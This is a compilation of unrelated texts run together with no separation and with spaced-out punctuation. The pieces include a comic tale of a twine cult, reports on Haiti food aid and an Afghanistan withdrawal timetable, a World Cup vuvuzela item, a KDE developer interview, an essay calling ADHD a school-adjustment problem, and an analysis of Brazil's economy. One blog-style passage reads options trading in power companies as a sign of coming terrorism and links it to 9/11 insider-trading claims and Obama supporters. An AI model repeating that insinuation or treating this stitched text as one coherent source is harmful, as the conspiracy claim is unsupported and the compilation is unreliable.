By this time most members were already achieving compositions of 70 and even 80 percent twine , and the heady rush of triumph imparted grandiose notions of superiority and a perverse sense of civil duty to lead and entwine others .
Subsequent clashes with nearby cotton farmers over the virtues of jute led to angry citizen protests , and from within the group new factions argued over the future of coir .
Exasperated with dissent and keen to continue the conversion of man into twine , in March of 1896 Saul Henequen ordered the group to pack its looms and relocate by rail to Oregon , where they founded the city of Cordings and resumed their studies in relative peace .
Little was heard from the Twiners for the next three years , but in 1899 a figure appeared outside the young city of Medford .
A man entered the town , dressed in robes and comprised entirely of twine .
It was Saul Henequen .
Henequen was a changed man .
His bearing struck many as regal , but one account written years later by Woody Lathison ( then a livery hand ) read :
Accounts vary , but all witnesses agree that as the panicked citizenry fanned out to discover the whereabouts of the drunken sheriff , Henequen executed a perfectly embroidered gesture toward a nearby copse wherefrom strode ten men in a disciplined line , each barking out his name and thread count as he emerged .
At this sight , even the ever - curious whores ( and have they since changed , gentle reader ? ) abandoned the brothel windows and fled screaming ; the Twiners paid them no mind .
Stopping only for a mysteriously brief foray into the barber 's empty shop , the column marched through a fusillade of hurled stones and perhaps a few bullets ( accounts are inconsistent ) in a grim procession toward their final destination : the shed of tanner Epid Peltis .
The Economy of a Tent City Just 10 weeks after the quake , Davidson finds a rich , complex economy sprouting in Port - au - Prince 's temporary settlements .
INTRODUCTION
In the aftermath of January 's devastating earthquake in Haiti , post - disaster relief is creating a new kind of problem for businesses there .
The massive influx of food aid has altered the price of rice , throwing the delicate balance in Haiti 's food supply chain out of whack and threatening to collapse the country 's rice market .
It 's the kind of problem that can turn a one - time disaster into a crisis that lasts years .
But international aid organizations like the U.N. 's World Food Programme are trying out a new method of delivering relief that they hope will avoid that problem .
" It 's a simple idea , " says reporter Adam Davidson of NPR's Planet Money .
" If people are hungry , do n't give them rice .
Give them money to buy rice , or vouchers that amount to the same thing .
That way , instead of destroying [ local ] business , you strengthen it . "
But as Davidson and producer Travis Fox discover in their story The Aid Dilemma -- part of a unique and ongoing partnership between NPR and FRONTLINE -- a simple idea can quickly turn complicated .
British troops are to pull out of Afghanistan by 2014 , under a secret blueprint for drawing down coalition forces that is set to begin in a matter or months , it emerged last night .
A leaked communiqué – a copy of which has been seen by The Independent on Sunday – reveals how President Hamid Karzai will announce the timetable for a " conditions - based and phased transition " at the International Conference on Afghanistan to be held in Kabul on Tuesday .
The meeting – which is set to map out the way ahead for the war - torn country – will be attended by US Secretary of State Hillary Clinton , UN Secretary - General Ban Ki-moon , the Foreign Secretary , William Hague , and foreign ministers from more 70 countries .
An agreed version of the document , marked " not for circulation " , was sent to senior diplomats yesterday by Staffan de Mistura , the United Nations Special Representative in Afghanistan .
It states : " The international community expressed its support for the President of Afghanistan 's objective that the Afghan National Security Forces ( ANSF ) should lead and conduct military operations in all provinces by the end of 2014 . "
This comes just weeks after Mr Hague hinted that British troops could leave by 2014 , and is the first formal confirmation of the timescale that governments have been working towards behind the scenes to agree in recent months .
The communiqué goes on to pledge that the international community will continue to " provide the support necessary to increase security during this time , and the continued support in training , equipping and providing interim financing to the ANSF at every level to take on the task of securing their country " .
It adds : " The government of Afghanistan and the international community agreed to jointly assess provinces , with the aim of announcing by the end of 2010 that the process of transition is under way . "
The announcement is one of many issues surrounding development and governance that will be addressed at the conference , as well as an $ 800 m ( £ 523 m ) five - year Afghan peace and reintegration programme that " aims to reintegrate in five years up to 36,000 ex-combatants and to reach 4,000 communities in 220 districts of 22 provinces " .
The document also outlines short - term goals for coalition troops .
These include combating the opium trade by maintaining the provinces that are currently free of drug cultivation , and increasing the number of poppy - free provinces in Afghanistan to 24 within 12 months .
It also describes transparent elections in future as a matter of paramount importance .
President Karzai will tell delegates that the conference represents " a turning point " in Afghanistan 's " transition to an era of Afghan - led peace , justice and more equitable development " .
He will also pledge that " expanding the day - to - day choices and capabilities of the Afghan people and ensuring their fundamental rights " will " remain the cornerstones of my government 's approach to peace - building and comprehensive recovery " .
A senior source in the British military confirmed yesterday that the blueprint was " a significant map laying out the stages on the way to withdrawal " .
He said : " The British government has been talking in terms of a 2014 withdrawal , but nobody has been able to produce a timetable identifying how and when things would happen .
This document demonstrates that there is a will in the international community to have it done by then .
" I cannot stress too much the importance of them having a strategy to do that .
In the past , the international community has come up with dates by which they wanted something to happen , but because they had no plans to back them up , too many deadlines were allowed to slip . "
Colonel Bob Stewart , the former UN commander in Bosnia and now MP for Beckenham , said last night : " Whether we can actually get out before 2014 is a bit like asking how long is a piece of string .
The aspiration is actually to be out by 2015 – if they can do it any quicker , the better .
I understand why we went in , to neutralise that part of the world and the threat of attack .
But I want us out as soon as possible , and so does the rest of the country . "
The new strategy came as it was reported that Britain is to divert hundreds of millions of pounds of aid away from other countries to help Afghanistan .
The International Development Secretary , Andrew Mitchell , is to boost aid to Afghanistan by 40 per cent , The Observer reported this weekend .
Four more British servicemen were killed in separate incidents in Afghanistan this weekend , the Ministry of Defence said yesterday .
A member of the Royal Dragoon Guards and a soldier from the Royal Logistics Corps died in separate blasts in the Nahr-e Saraj district of Helmand yesterday .
On Friday , an airman from the RAF Regiment died in a road accident near Camp Bastion in Helmand , and a marine from 40 Commando Royal Marines died in an explosion while on foot patrol in Sangin .
Next of kin have been informed .
The latest deaths , taking the total to 322 , have added to a summer of escalating violence as Afghan and coalition forces step up patrols in the Taliban - dominated south in a push to take control of the traditional insurgent stronghold .
Last month was the deadliest for coalition soldiers since the war began in 2001 , with 103 killed .
The killing of three UK soldiers by a rogue Afghan recruit in Helmand on Tuesday highlighted the scale of the task of building up a local security force capable of maintaining security , and has raised tensions between coalition soldiers and their Afghan allies .
Success is by no means certain , with the strategic plan of creating an Afghan security force capable of taking over from coalition forces fraught with difficulty .
Afghan police and soldiers have been infiltrated by the Taliban at senior levels , and the forces are plagued by corruption and drug addiction .
Already this month , as the IoS revealed , the system for assessing them is so flawed that it has been scrapped , and a report by the US Special Inspector General for Afghanistan Reconstruction ( Sigar ) warned that Afghan assessments " have overstated operational capabilities " .
DallasGoldBug
Before It ’s News
July 15 , 2010
Just as the three days before 9/11 there was unusual amounts of trading going on with American Airlines ( goldmansucks ) we are seeing the same type of action this time with power companies .
This as Obama suporters say an act of terrorism is the only thing that will save him .
www.marketintellisearch.com/articles/1028750.html
Interesting Options Volume for CenterPoint Energy ( CNP )
Posted on 07/13/2010 by Leo Goldman
NEW YORK ( Market Intellisearch ) — Unusual volume of put contracts was traded today .
There were 713 puts contracts versus the ten day average volume of 55 .
On the calls side , 27 calls contracts were traded .
Today ’s traded Put / Call ratio is 26.41 .
There were 26.41 puts traded for each call contract .
Put / Call ratio is often used to measure investment sentiment , the ratio serves as a predictor of investor behavior .
Unusual options volume provides reliable clues that the stock is expected to make a move .
CenterPoint Energy ( CNP ) closed at $ 14.07 in the last trading session and opened today at $ 14.19 .
CNP is trading at $ 14.19 , up $ 0.12 ( +0.85 % ) in today ’s trading session .
The daily low is $ 14.10 and the high is $ 14.32 .
The trading volume of 3,435,131 is below the average volume of 4,771,960 shares .
CNP is trading above the 50 day moving average and higher than the 200 day moving average .
The stock ’s 52 week low is $ 5.67 and 52 week high is $ 14.90 .
The stock has a P/E ratio of 12.73 and a dividend yield of 5.47 % .
Iron
Mt this is strange .
www.marketintellisearch.com/articles/1028761.html
A d v e r t i s e m e n t
Unusual Trading Activity for Iron Mountain Inc. ( IRM ) Posted on 07/13/2010 by Leo Goldman
NEW YORK ( Market Intellisearch ) — Unusual volume of call contracts was traded today .
There were 756 call contracts traded compared to the ten day average volume of 122 contracts .
On the put side , 42 put contracts exchanged hands .
Today ’s traded Put / Call ratio is 0.06 .
There were 18.00 calls traded for each put contract .
Options are useful tools for predicting the movement of the underlying stock .
Put / Call ratio statistics serve as a useful predictor of investment sentiment , indicating what experienced investors are doing in preparation for a move of an underlying stock .
Thus , unusual volume provides reliable clues that the stock is expected to make a move .
Shares of IRM closed at $ 23.41 in the previous trading session and opened today at $ 23.64 .
Iron Mountain Inc. settled the day up $ 0.61 to $ 24.02 in the trading session .
The day ’s trading range is between $ 23.60 and $ 24.10 respectively .
On the volume side , 816,856 shares were traded which is less than the average volume of 1,455,930 shares .
IRM is trading below the 50 day moving average and lower than the 200 day moving average .
The stock ’s 52 week low is $ 21.32 and 52 week high is $ 32.04 .
The stock has a P/E ratio of 22.00 and a dividend yield of 0.54 % .
Fifa says it will take action if it finds grounds to do so
Their cacophonous din has so far been a soundtrack for the World Cup , to the delight of some and the profound annoyance of others .
But organisers said that the vuvuzela , one of the most visible and certainly most audible motifs of the tournament 's opening weekend , could yet be banned from inside stadiums .
Organising committee chief executive Danny Jordaan said he would continue to monitor their use and that a ban could be enforced if there were " grounds to do so " .
Fifa and organisers have already said that they will ban the instrument if any are thrown onto the pitch or used as a weapon and urged fans not to blow them during national anthems .
" We did say that if any land on the pitch in anger we will take action .
We 've tried to get some order .
We have asked for no vuvuzelas during national anthems or stadium announcements .
It 's difficult but we 're trying to manage the best we can , " he told the BBC .
" We 've had some broadcasters and individuals [ complaining ] and it's something we are evaluating on an on - going basis . "
The BBC and ITV have received complaints from viewers about the background noise and , while both have said they will monitor the situation , they have also made the point that it is important to reflect the atmosphere of the tournament .
Fifa has previously shrugged off complaints from broadcasters , players and coaches about the noise from the plastic horns that are being sold on every street corner in South African host cities .
Following last year 's Confederations Cup , there were complaints from coaches , players and broadcasters about the noise .
But Fifa said that the horns formed part of the unique African atmosphere of the tournament and refused to ban them .
But Jordaan himself , who battled for 16 years to bring the World Cup to South Africa , said he would prefer the 10 stadiums hosting the World Cup to ring to the sound of singing and dancing than the drone of the vuvuzela .
" I would prefer singing .
It 's always been a great generator of a wonderful atmosphere in stadiums and I would try to encourage them to sing , " he said .
" In the days of the struggle ( against apartheid ) we were singing , all through our history it 's our ability to sing that inspired and drove the emotions . "
Stephen Kelly Stephen Kelly
Yesterday , Stephen Kelly wrote on the dot about the successful KDE PIM sprint .
Today , you can read more about him and his role as KJots maintainer in this interview by Giovanni from our Italian KDE community .
This continues a trend of recent interviews talking to members of the KDE PIM team - last time we heard from Thomas McGuire of KMail .
For our Italian readers , there is also the original interview .
Hello Stephen , can you introduce yourself to our readers ?
My name is Stephen Kelly , I 'm 25 years old , Irish and currently living in Berlin .
I graduated from Mechanical Engineering in Dublin some years ago and now I work for KDAB , most visibly on Akonadi and KDE PIM .
When did you first hear about KDE ?
I first heard about KDE when I installed Fedora Core 5 in March 2006 .
It was my first encounter with linux and during the setup I installed both KDE and GNOME environments .
In the end I used the KDE desktop more so I stuck with that .
In which part of the KDE community and in what development area(s ) are you involved ?
Can you talk us about KJots ?
What is it ?
My contributions within KDE are mostly in the area of model / view in the KDE Development platform ( kdelibs and kdepimlibs ) and developing infrastructure and prototypes for Akonadi applications .
Akonadi is a framework for Personal Information Management ( PIM ) , which means email , contacts , events , tasks , notes etc .
It provides a platform for creating PIM applications such as email readers , contact storage applications , calendaring and more .
Currently we are basing popular KDE applications such as KMail , KaddressBook and KOrganizer on Akonadi , but it can be reused throughout the entire platform and by all applications .
I also maintain the KJots application , which is a simple note taker which makes it easy for users to organize notes in a heirarchy .
KJots is already based on Akonadi , so the same notes can be viewed and edited directly on the Plasma workspace too .
Is the porting to Akonadi ready or there are still some parts of your application that have to be ported ?
What benefits will Akonadi give to Kjots users ?
For KJots the porting to Akonadi is almost complete , and we expect to release it with version 4.5 of the KDE Software Compilation .
Aside from making the notes available through Plasma , Akonadi enables KJots to store the notes in a remote location instead of locally on your computer , such as an FTP server , a groupware server , and possibly even any IMAP server .
Another benefit that Akonadi brings is code sharing with the rest of the KDE PIM applications , particularly KMail , as notes and emails are very similar .
What are the difficulties you encounter in developing a PIM application ?
How much of your time do you dedicate to programming for KDE ?
For new developers it is getting easier to develop PIM applications every month .
Akonadi provides a strong base for anyone to create their own application .
If KMail does n't suit your needs , get in touch and we can help you write an email client that better suits you and people like you !
As part of my employment involves Akonadi and KDE development I work at least 40 hours a week on KDE , and sometimes more .
What application do you use to develop KJots ?
What is the knowledge needed to develop an application like Kjots ?
I use KDevelop and CMake for all of my Qt related development .
The KDevelop team have made an excellent application and the stable release of KDevelop is very exciting .
There are parts of KJots which are very easy to get started developing on , such as the rich text sections and some configuration .
Sending small patches to KJots was my introduction to Qt and KDE programming at a time before I knew anything about programming ( some would say I still do n't :) ) .
I personally prefer a desktop application to do my things .
What do you think of all these integrated web application ?
Facebook , Google Apps ?
I also prefer rich client desktop applications , and KDE is an attractive platform to create and use them on .
While a cloud / web service provides an integration point , many clouds provide many integration points which you need to keep track of , and then it 's not an integration point anymore !
Moving from one service to another is not usually possible either which means permanence of your data is a big issue .
With KDE and OwnCloud though , there is only one integration point and it is controlled by the user .
What are the missing features within KDE applications you think we should have to build a stronger product series ?
Full integration of Nepomuk and Akonadi throughout the platform and shared between multiple devices .
There 's a lot of potential there for allowing new ways to use computers but it is very new technology and there are many areas it could be used in .
It will take us a while before we reach the true , integrated future .
There is very exciting progress with each release though .
What are in your opinion the KDE applications which are doing a very good job ?
And which ones need lots of love and help ?
I 'm always very impressed with the KDE Games and Educational applications , and I think everyone is .
And I like Konsole , KDevelop and Amarok which I use a lot .
I think there 's a gap though for an application to handle jabber with many group chats with many participants .
The existing clients do n't seem to suit my specific needs there .
What ’s your favourite KDE application ?
Akregator , KNode and Konqueror perhaps .
They are my window to the web and to mailing lists . :)
What are your plans for KJots in the next KDE PIM release ?
Apart from Akonadi integration , KJots in KDE PIM 4.5 will use Grantlee internally for user defined theming and export of notes .
There wo n't be a UI for configuring themes though until at least 4.6 .
Part of the Google Summer of Code project of Ronny Yabar this year will involve making KJots themes user - configurable and sharable .
Are you payed to work on KDE software ?
Yep .
My job currently involves improving the features and quality of KDE PIM and Akonadi on the desktop and on mobile platforms .
What motivates / keeps you motivated to work on KDE software ?
Community spirit , a desire to make better software than the competition and scratching personal itches .
If you could choose where you can live what place you will choose and why ?
I really like Dublin and Berlin , but I also really like travelling , so maybe I 'd choose to be a Nomad for a while . :)
Have you ever been in Italy ?
If so , where ?
Yes , I 've been to Milan , Verona , Rome and Rimini .
Plenty more left to see . :)
Do you like reading ?
What was the last book you read ?
Yes I like reading , but do n't do it as often as I would like to .
The last book I read was Brave New World .
I sometimes drop small ( or big ) references to books I 'm reading in my blog .
If you recognize any , leave a comment !
Stephen , thank you for your time and good luck with what you 're doing .
[ Note : Facebook couns on this post have reset to zero . ]
According to the most authoritative recent data , approximately 8 % of children in the United States , aged 4 to 17 , have been diagnosed as having ADHD ( ) . [ 1 ]
The same reports note that the disorder is about three times as frequent in boys as it is in girls , so this means that roughly 12 % of boys and 4 % of girls have received the diagnosis .
Think of it .
Twelve percent of boys -- that 's approximately one boy out of every eight -- has been determined by some clinical authority , using official diagnostic criteria set out by the American Association , to have this particular mental disorder !
[ Note added in June , 2015 .
Now things have gotten worse .
According to the latest data , now 20 % of boys are diagnosed with ADHD at some point in their school . ]
If only teachers ' ratings were used , the numbers would be even greater .
In one study involving 16 different schools and more than three thousand children , teachers filled out the standard ADHD diagnostic checklist of behaviors for the students in their classrooms .
[ 2 ]
In that study , where teachers ' ratings were not averaged in with the ratings made by parents , 23 % of elementary school boys and 20 % of secondary school boys were diagnosed as having ADHD .
What an amazing finding .
By teachers ' ratings , nearly one fourth of all elementary school boys and one fifth of all secondary school boys has the mental disorder , ADHD !
ADHD is Fundamentally a School Adjustment Problem
What does it mean to have ADHD ?
Basically , it means failure to adapt to the conditions of standard schooling .
Most diagnoses of ADHD originate with teachers ' observations .
[ 3 ]
In the typical case , a child has been a persistent pain in the neck in school -- not paying , not completing assignments , disrupting class with excessive movements and verbal outbursts -- and the teacher , consequently , urges the parents to consult with a clinician about the possibility that the child has ADHD .
Using the standard diagnostic checklists , the clinician then takes into account the ratings of teachers and of parents concerning the child 's behavior .
If the ratings meet the criterion level , then a diagnosis of ADHD is made .
The child may then be put on a drug such as Adderall or Concerta , with the result , usually , that the child 's behavior in school improves .
The student begins to do what the teacher asks him to do ; the classroom is less disrupted ; and the parents are relieved .
The drug works .
The diagnostic criteria for ADHD , as outlined by - IV ( the official diagnostic manual of the American Psychiatric Association ) , clearly pertain primarily to school behavior .
The manual lists nine criteria having to do with inattention and another nine having to do with hyperactivity and impulsivity .
If a child manifests at least six of either set of nine , to a sufficient degree and over a long enough period of time , then the child is identified as having one or another version of ADHD .
Depending on which set of criteria are manifested , the child is given a diagnosis of ADHD Predominantly Inattentive Type ; ADHD Predominantly Hyperactive - Impulsive Type ; or ADHD Combined Type .
Here , for you to peruse , are the complete lists of criteria , quoted directly from DSM -IV :
Inattention
1 . Often does not give close attention to details or makes careless mistakes in schoolwork , work , or other activities .
2 . Often has trouble keeping attention on tasks or play activities .
3 . Often does not seem to listen when spoken to directly .
4 . Often does not follow instructions and fails to finish schoolwork , chores , or duties in the workplace ( not due to oppositional behavior or failure to understand instructions ) .
5 . Often has trouble organizing activities .
6 . Often avoids , dislikes , or does n't want to do things that take a lot of mental effort for a long period of time ( such as schoolwork or homework ) .
7 . Often loses things needed for tasks and activities ( e. . toys , school assignments , pencils , books , or tools ) .
8 . Is often easily distracted .
9 . Is often forgetful in daily activities .
Hyperactivity & Impulsivity
1 . Often fidgets with hands or feet or squirms in seat .
2 . Often gets up from seat when remaining in seat is expected .
3 . Often runs about or climbs when and where it is not appropriate ( adolescents or adults may feel very restless ) .
4 . Often has trouble playing or enjoying leisure activities quietly .
5 . Is often " on the go " or often reacts as if " driven by a motor " .
6 . Often talks excessively .
7 . Often blurts out answers before questions have been finished .
8 . Often has trouble waiting one 's turn .
9 . Often interrupts or intrudes on others ( e.g. , butts into conversations or games ) .
OK , after reading this list , who is surprised that so many boys have been diagnosed as having ADHD and that teachers usually initiate the diagnostic process ?
Raise your hand ( but please do n't blurt out your answer before I call on you ) .
How convenient that we have this official way of diagnosing kids who do n't sit still in their seats , often fail to pay attention to the teacher , do n't regularly do the assignments given to them , often speak out of turn , and blurt out answers before the questions are finished .
They used to be called " naughty " -- sometimes with a frown , sometimes with a smile of recognition that " kids will be kids " or " boys will be boys " -- but now we know that they are , for biological reasons , mentally disordered .
And , wonder - of - wonders , we even have an effective treatment .
We can give them a powerful drug - - a preparation of or amphetamine , both of which have effects on the brain similar to those of ( but without the euphoria ) and are , for good reasons , illegal to take unless you have been diagnosed with a mental disorder and given a prescription .
The drug works .
The children become more tractable and classroom becomes easier . [ 4 ]
The most common subtype of ADHD is the Predominantly Inattentive Type .
This is the disorder that used to be called just ADD .
A highly respected pediatrician at Yale University who treats ( with drugs ) many children diagnosed with this disorder made this interesting confession : " A disproportionate number of children labeled ‘ ADHD without hyperactivity ' are exceptionally bright and creative children .
I 've often thought that these kids find their own inner theater much richer and more interesting than the outer theater of the classroom and , so , naturally , focus on it at the expense of classroom attention .
. .
The proper fix for this problem would be done at the school level , a place where I am unlikely to have any significant effect .
I can , however , help these children concentrate and return their attention to the classroom . " [ 5 ]
Why Do So Many Kids Have Difficulty Adjusting to School ?
From an evolutionary perspective , school is an abnormal environment .
Nothing like it ever existed in the long course of evolution during which we acquired our human nature .
School is a place where children are expected to spend most of their time sitting quietly in chairs , listening to a teacher talk about things that do n't particularly interest them , reading what they are told to read , writing what they are told to write , and feeding memorized information back on tests .
As I have detailed in previous essays , during the entire course of human history until very recently , children were in charge of their own .
They learned by following their own inner , instinctive guides , which led them to ask countless questions ( their own questions , not someone else 's ) , to converse with others as equal partners , to explore their world actively , and to practice the skills crucial to their culture through self - directed play in age - mixed groups .
[ See Children Educate Themselves II : The Wisdom of Hunter - Gatherers . ]
From my evolutionary perspective , it is not at all surprising that many children fail to adapt to the school environment , in ways that lead to the ADHD diagnosis .
All normal children have at least some difficulty adapting to school .
It is not natural for children ( or anyone else , for that matter ) to spend so much time sitting , so much time ignoring their own real questions and interests , so much time doing precisely what they are told to do .
We humans are highly adaptable , but we are not infinitely adaptable .
It is possible to push an environment so far out of the bounds of normality that many of our members just can't abide by it , and that is what we have done with schools .
It is not surprising to me that the rate of diagnosis of ADHD began to skyrocket during the same decade ( the 1990s ) when schools became even more restrictive than they had been before -- when high - stakes testing became prominent , when recesses were dropped , when teachers were told that they must teach to the standardized tests and everyone must pass or the teachers themselves might lose their jobs .
Schools ' Intolerance of Normal Human Diversity
Why do some kids adapt to school better than do others ?
The answer to that does lie in biology - - normal biology , not abnormal biology .
For good evolutionary reasons , members of our species vary genetically in ways that create diversity in . [ 6 ]
People have always lived in communities , and communities -- as well as the individuals within them - - benefit from diversity .
It is good that some people are relatively restrained while others are more impulsive , that some are relatively passive while others are more active , that some are cautious while others are bolder , and so on .
These are among the dimensions that make up normal personality .
In situations where people are free , they find ways of behaving and learning that fit best with their biological nature , and through those means they make unique contributions to the communities in which they live .
Normal human environments always have a variety of niches that people can occupy , and people who are free naturally choose niches where they are most comfortable and happy , the niches that match best with their biological nature .
But school , especially today , does not have a variety of niches .
Everyone is expected to do the same thing , at the same time , in the same way .
Everyone must pass the same tests .
Some people , apparently most , have a personality that allows them to adapt sufficiently well to the school environment that they pass the tests and avoid behaving in ways that the teachers can't tolerate .
School may take its toll on them , but the toll is not so obvious .
The toll may manifest itself as diffuse , or moderate , or , or suppression of self - initiative and ; but the school system can absorb all that .
Those characteristics become viewed as " normal . "
Unless they become really extreme , they do n't get DSM - IV diagnoses .
It 's the kids whose personalities do not allow them to go along with the system who get the ADHD diagnoses .
And most of those are boys .
One of the biological characteristics that predisposes for ADHD in the school environment , obviously , is the .
For evolutionary reasons , boys are , on average , more physically active , more adventurous ( in the sense of taking risks ) , more impulsive , and less compliant than are girls .
A normal distribution of such traits exists for both boys and girls .
The distributions overlap considerably , but are not identical .
The cutoff on the distribution that gets you a diagnosis of ADHD in our present society happens to be at a point that includes about 12 % of boys and 4 % of girls .
In another setting , where they could choose their niches , most of those kids would do just fine .
An Illustrative Story
I 'll conclude with a true story to illustrate all this .
It pertains to a young man whom I have known well since he was thirteen years old .
Throughout his school years he was funny , playful , extraordinarily impulsive , and a huge pain in the neck to essentially all of his teachers .
He rarely completed a school assignment and was constantly disruptive in class .
He truly could not focus on any of his school lessons and he seemed unable to prevent himself from saying what was on his mind rather than what he was supposed to say .
His parents were regularly called in for conferences .
When school officials asked his parents to take him to a clinic for ADHD diagnosis , his mother - - a physician who knew that the long - term brain effects of the drugs used to treat ADHD have never been tested in humans and have proven deleterious in laboratory animals -- refused to do so .
The boy had all the characteristics of ADHD Combined Type , and I have no doubt that he would have received that diagnosis had his mother consented .
Thanks to a relatively lenient and understanding assistant principal , he was passed along from grade to grade , even though he did almost none of the assigned work and failed most of his tests .
He graduated from high school at the bottom of his class .
Then the good part of his life began .
Clearly unfit for college , he did a year in an internship program and discovered that he enjoyed cooking and was good at it .
After working in a restaurant for a while , he received recommendations that got him into a culinary school , where he loved the work and excelled .
Now , at the age of 22 , he has an excellent job as assistant to the chef in a very busy , very successful restaurant .
In this setting , which requires constant , active , hands - on work and the kind of mental brilliance that involves attending to and responding to many competing and immediately demanding sources at once , he shines .
He has found his niche .
He learned nothing from his 13 years of public schooling , but , because of his buoyant personality , school did not destroy him .
When he was finally out of school , free to pursue his own interests in the real world , he found his niche and now is thriving there .
The real world , thank goodness , is very different from school .
Update : Followup posts addressing questions raised by this post
@font - face { font - family : " Times " ; }p. MsoNormal , li.
MsoNormal , div .
MsoNormal { margin : 0in 0in 0.0001 pt ; font - size : 12pt ; font - family : " Times New Roman " ; }div .
Section1 { page : Section1 ; } @font - face { font - family : " Cambria " ; }p. MsoNormal , li.
MsoNormal , div .
MsoNormal { margin : 0in 0in 0.0001 pt ; font - size : 12pt ; font - family : " Times New Roman " ; }a:link , span .
MsoHyperlink { color : blue ; text - decoration : underline ; }a:visited , span .
MsoHyperlinkFollowed { color : purple ; text - decoration : underline ; }div .
Section1 { page : Section1 ; }
The " ADHD Personality " : Its Cognitive , Biological , and Evolutionary Foundations
@font - face { font - family : " Cambria " ; }p. MsoNormal , li.
MsoNormal , div .
MsoNormal { margin : 0in 0in 0.0001 pt ; font - size : 12pt ; font - family : " Times New Roman " ; }a:link , span .
MsoHyperlink { color : blue ; text - decoration : underline ; }a:visited , span .
MsoHyperlinkFollowed { color : purple ; text - decoration : underline ; }div .
Section1 { page : Section1 ; }
Experiences of ADHD - Labeled Kids Who Switch from Conventional Schooling to Homeschooling or Unschooling
----------
Notes
* Some hyperlinks in these posts are automatically generated and may or may not link you to sites that are relevant .
Author - generated links are distinguished from automatic ones by underlines .
[ 1 ]
For ADHD prevalence data , see : Vissar et al. ( Feb. , 2007 ) , Pediatrics 119 , S99 - S106 ; Centers for Disease Control and Prevention ( Sept. 2 , 2005 ) , " Mental health in the United States : Prevalence of Diagnosis and Treatment for ADHD , " MMWR : Morbitidy and Mortality Weekly Report 54 , 842-846 ; and Mayes et al ( 2009 ) , Medicating Children : ADHD and Pediatric Mental Health ( Harvard University Press ) , p 2 .
[ 2 ] Nolan et al. ( 2001 ) , Teacher reports of DSM - IV ADHD , ODD , and CD symptoms in schoolchildren .
Journal of the Academy of Child and Adolescent Psychiatry , 40 , 241-249 .
[ 3 ]
See Mayes et al. , p 4 .
[ 4 ]
In order to make ADHD not appear to be just a school problem , DSM - IV adds the stipulation that the symptoms must be seen in at least one other setting , not just in school .
However , it does not stipulate that the other setting has to be radically different from school .
It is easy to see how parents , after being convinced that their child has ADHD from the school reports , might " see " such symptoms at home or in another setting -- especially while doing homework , or when involved in some adult - directed activity such as lessons or formal sports outside of school .
Nevertheless , the failure of these symptoms to manifest themselves so much in settings outside of school probably explains why rates of ADHD diagnoses based just on teacher reports are so much higher than those based on a combination of teachers ' and parents ' reports .
[ 5 ] Sidney Spiesel , quoted by Mayes et al. , p 12 .
[ 6 ]
For a documented discussion of the evolutionary foundation for diversity in personality in humans and other species see P. Gray ( 2010 ) , Psychology , 6th Edition , pp 560 - 570 .
WHEN , in 2001 , Goldman Sachs dreamt up the acronym BRICs for the largest emerging economies , the country that most people said did not belong in the group was Brazil .
Today , the leading candidate for exclusion is Russia .
But some prominent observers are still sceptical about Brazil 's prospects .
A notable example is Martin Wolf , the chief economics commentator of the Financial Times , who recently ( and very reasonably ) pointed out that Brazil 's share of world output has actually fallen over the past 15 years , from 3.1 % in 1995 to 2.9 % in 2009 at purchasing - power parity .
“ Brazil cannot become as big a player in the world as the two Asian giants ” , China and India , Mr Wolf concludes .
At a recent meeting with a group of investors in Hong Kong , Rubens Ricupero offered an intriguing counterargument .
A long - serving and respected Brazilian diplomat , Mr Ricupero was the secretary - general of the United Nations Conference on Trade and Development from 1995 to 2004 .
Although he has links to the opposition to Brazil 's ruling Workers '
Party — he previously served as finance minister in the government of a rival party — his analysis is not party - political .
“ For the first time in its history , ” he argues , Brazil is enjoying “ propitious conditions in four areas that used to pose serious limitations to growth . ”
They are :
Commodities .
Commodity production used to be regarded as either a curse or , at best , something countries ought to diversify away from as quickly as possible ( which Brazil itself did in the 1970s ) .
But over the next fifty years , Mr Ricupero notes , half the expected increase in the world population will come from eight countries , of which only one — America — is not sucking in commodities at an exponential rate of increase .
The others are China , India , Pakistan , Nigeria , Bangladesh , Ethiopia and Congo .
China alone will account for 40 % of the additional demand for meat worldwide , he points out .
This demand will remain strong partly because of rising population and partly because of urbanisation , which increases demand for industrial commodities ( like iron ore to make steel ) and meat ( because urbanisation changes eating habits ) .
Brazil is already a large iron - ore producer , and has transformed itself into an agricultural powerhouse over the past 10 years , becoming the first tropical country to join the ranks of the dominant temperate - climate food exporters such as America and the European Union .
It is well - placed to benefit from the emerging markets ' commodity boom .
Petroleum .
Mr Ricupero argues that the success of the Brazilian state oil company , Petrobras , in offshore oil exploration has transformed Brazilian energy .
“ Although no precise and final estimates can be made yet of the [ so - called ] pre-salt oil reserves potential of the Santos Basin , ” he says , “ all serious indications point to the high likelihood that Brazil is poised to become at least a medium - sized net oil - exporting country . ”
New oil and gas deposits far away from the volatile Middle East should increase Brazil 's strategic importance , as well as improving its balance - of - payments position .
Demography .
Brazil is reaping a big demographic dividend .
In 1964 , its fertility rate ( the average number of children a woman can expect to have during her lifetime ) was 6.2 .
It fell to 2.5 in 1996 , and is now below replacement level , at 1.8 , one of the sharpest drops in the world .
The result has been a collapse in the dependency ratio — the number of children and old people dependent on each working - age adult .
As recently as the 1990s , that ratio was 90 to 100 ( ie , there were 90 dependents , mostly children , for each for every 100 Brazilians of working age ) .
It is now 48 to 100 .
Thanks to this , Brazil no longer has to build schools , hospitals , universities and other social institutions helter - skelter to keep pace with population growth .
Eventually , the ratio will creep back up as today 's workforce enters retirement , but such problems remain decades ahead .
In the meantime , Brazil can pay more attention to the quality rather than the quantity of its social spending , which should , in theory , improve the population 's education , health , and work skills .
Urbanisation .
Urbanisation both encourages economic growth and accompanies it .
But it also causes problems .
“ Many of the worst contemporary problems in Brazil , ” Mr Ricupero says , such as “ lack of educational and health facilities , poor public transportation , marginalisation and criminality , stem from [ an ] inability to cope with internal migrations in an orderly and planned way . ”
That is now changing , he argues .
The waves of migrants out of the countryside and into the cities have more or less finished .
Brazil is now largely an urban country : about four - fifths of the population lives in cities .
“ For Brazil , ” he concludes , “ the period of frantic and chaotic growth of big cities that is now taking place in Asia and Africa is already a thing of the past . ”
Mr Ricupero is relatively cautious about the conclusion .
“ The four sets of conditions outlined above , ” he says “ are by no means sure guarantees of automatic success . ”
He admits Brazil has fallen behind in infrastructure , for example , and says that , if it had the sort of infrastructure you see in Costa Rica and Chile ( the two best examples in Latin America ) , economic growth would be about two percentage points higher per year .
On the other hand , Brazil also has some other advantages : unlike China , Russia and India , it is at peace with its neighbours ( all 10 of them ) .
Whether you think all this really amounts to a rejoinder to Mr Wolf is a matter of doubt .
Brazil might still remain a relatively small player in the world .
